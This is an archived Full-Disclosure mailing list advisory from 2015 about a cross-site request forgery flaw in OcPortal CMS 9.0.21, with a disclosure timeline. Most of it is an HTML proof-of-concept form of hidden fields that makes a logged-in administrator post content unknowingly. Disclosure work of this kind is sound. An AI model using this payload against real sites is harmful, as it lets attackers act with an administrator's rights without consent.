lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sat, 12 Dec 2015 20:23:55 +0530
From: CSW Research Lab <>
Subject: [FD] OcPortal CMS 9.0.21 – Cross-site Request Forgery (CSRF) Vulnerability

OcPortal CMS 9.0.21 – Cross-site Request Forgery (CSRF) Vulnerability


Vulnerability Type :  Cross-site Request Forgery (CSRF) Vulnerability
Vulnerable Version : 9.0.21
Severity: High
Author – Arjun Basnet


OcPortal CMS is prone to CSRF vulnerability bypasses  referrer checks for
checking forms posted to the system. It allows an attacker to trick
administrators into submitting coded forms (i.e. coded actions) into the
system which means an attacker can add an admin user and thus gain code

Proof of Concept
<html lang="en">
<title>OcPortal 9.0.21 CSRF Vulnerability POC</title>
<form action="
enctype="multipart/form-data" method="post" id="formid">
<input type="hidden" name="MAX_FILE_SIZE" value="16777216" />
<input type="hidden" name="file1" value="" />
<input type="hidden" name="tick_on_form__validated" value="0" />
<input type="hidden" name="label_for__allow_rating" value="Allow rating" />
<input type="hidden" name="f_face" value="/" />
<input type="hidden" name="require__author" value="1" />
<input type="hidden" name="label_for__title" value="Title" />
<input type="hidden" name="file" value="" />
<input type="hidden" name="label_for__meta_description" value="Concise
description" />
<input type="hidden" name="require__meta_description" value="0" />
<input type="hidden" name="validated" value="1" />
<input type="hidden" name="label_for__meta_keywords[]1" value="Keywords" />
<input type="hidden" name="label_for__meta_keywords[]0" value="Keywords" />
<input type="hidden" name="meta_description" value="Attack_OcPortal" />
<input type="hidden" name="allow_comments" value="1" />
<input type="hidden" name="comcode__news" value="1" />
<input type="hidden" name="http_referer" value="
http://localhost/ocportal/cms/index.php?page=cms_news&type=ad" />
<input type="hidden" name="author" value="Attack_OcPortal" />
<input type="hidden" name="pre_f_notes" value="1" />
<input type="hidden" name="post__is_wysiwyg" value="1" />
<input type="hidden" name="label_for__file" value="Image" />
<input type="hidden" name="comcode__title" value="1" />
<input type="hidden" name="require__news_category" value="0" />
<input type="hidden" name="allow_rating" value="1" />
<input type="hidden" name="tick_on_form__allow_rating" value="0" />
<input type="hidden" name="require__allow_comments" value="0" />
<input type="hidden" name="label_for__validated" value="Validated" />
<input type="hidden" name="label_for__notes" value="Notes" />
<input type="hidden" name="label_for__post" value="News article" />
<input type="hidden" name="meta_keywords[]" value="Attack_OcPortal" />
<input type="hidden" name="label_for__main_news_category" value="Main
category" />
<input type="hidden" name="f_size" value="" />
<input type="hidden" name="require__allow_rating" value="0" />
<input type="hidden" name="label_for__author" value="Source" />
<input type="hidden" name="require__title" value="1" />
<input type="hidden" name="comcode__post" value="1" />
<input type="hidden" name="news" value="Attack_OcPortal" />
<input type="hidden" name="post" value="Attack_OcPortal" />
<input type="hidden" name="require__validated" value="0" />
<input type="hidden" name="news__is_wysiwyg" value="1" />
<input type="hidden" name="require__notes" value="0" />
<input type="hidden" name="label_for__allow_comments" value="Allow
comments" />
<input type="hidden" name="posting_ref_id" value="13973" />
<input type="hidden" name="f_colour" value="" />
<input type="hidden" name="label_for__news" value="News summary" />
<input type="hidden" name="require__meta_keywords" value="0" />
<input type="hidden" name="notes" value="Attack_OcPortal" />
<input type="hidden" name="title" value="Attack_OcPortal" />
<input type="hidden" name="require__file" value="0" />
<input type="hidden" name="require__main_news_category" value="1" />
<input type="hidden" name="label_for__news_category" value="Secondary
categories" />
<input type="hidden" name="main_news_category" value="7" />

Severity Level:

Vulnerable Product:

[+] OcPortal CMS 9.0.21

Advisory Timeline

12-Nov-2015- Reported
12-Nov-2015- Vendor released hotfix
12-Dec-2015- Public disclosed

Fixed Version:
Vendor has released the hotfix for this issue please refer below link:



Credits & Authors
Arjun Basnet from Cyber Security Works Pvt. Ltd. (

Cheers !!!

Team CSW Research Lab <>

Sent through the Full Disclosure mailing list
Web Archives & RSS:

Powered by blists - more mailing lists